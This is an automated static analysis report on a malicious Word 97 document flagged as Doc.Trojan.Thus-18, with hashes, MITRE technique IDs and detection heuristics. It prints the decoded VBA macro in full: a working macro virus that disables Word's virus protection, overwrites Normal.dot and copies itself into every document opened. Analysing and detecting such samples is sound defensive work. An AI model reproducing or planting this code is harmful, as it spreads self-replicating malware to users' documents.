Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff2e38ffa7822672…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d742b7a192608200192e97a139f42dd1
SHA-1: be9c8a2ed5e4ea5799a0edb21f7aabeeac21775d
SHA-256: ff2e38ffa7822672d1a461f18d6bc4aebb97e67aed155412570b170f9356a42e
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Thus-18. A critical heuristic detected a Document_Open VBA macro, which is often used to execute malicious code upon document opening. The macro attempts to overwrite the Normal.dot template, suggesting an attempt to establish persistence or spread the malicious macro to other documents.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-18 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Thus-18
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1223 bytes
SHA-256: 05270d8ef856e02cfd513fc9dc49da68d4fac557c6f3009fb7e89df979f1ac58
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Please do NOT modify this file !
Private Sub Document_Open()
On Error Resume Next

Options.VirusProtection = False

Set ad = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set nt = NormalTemplate.VBProject.VBComponents(1).CodeModule

Dim mark As String
mark = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(1, 1)
If mark = "'Please do NOT modify this file !" Then

 ad.DeleteLines 1, ad.CountOfLines
 ad.InsertLines 1, nt.Lines(1, nt.CountOfLines)
 
Else
NormalTemplate.VBProject.VBComponents(1).CodeModule.DeleteLines 1, nt.CountOfLines
nt.InsertLines 1, "'Please do NOT modify this file !"
nt.InsertLines 2, ad.Lines(2, ad.CountOfLines)

If Day(Now) = 12 Then MsgBox "It's TOO much violence in this world!" & Chr(10) & Chr(13) & "Have MOT to stop it!", vbCritical, "I say:"

NormalTemplate.Save
ActiveDocument.Save
ThisDocument.Save


' [MOT] (C) Dr.Copy 1999

End If




End Sub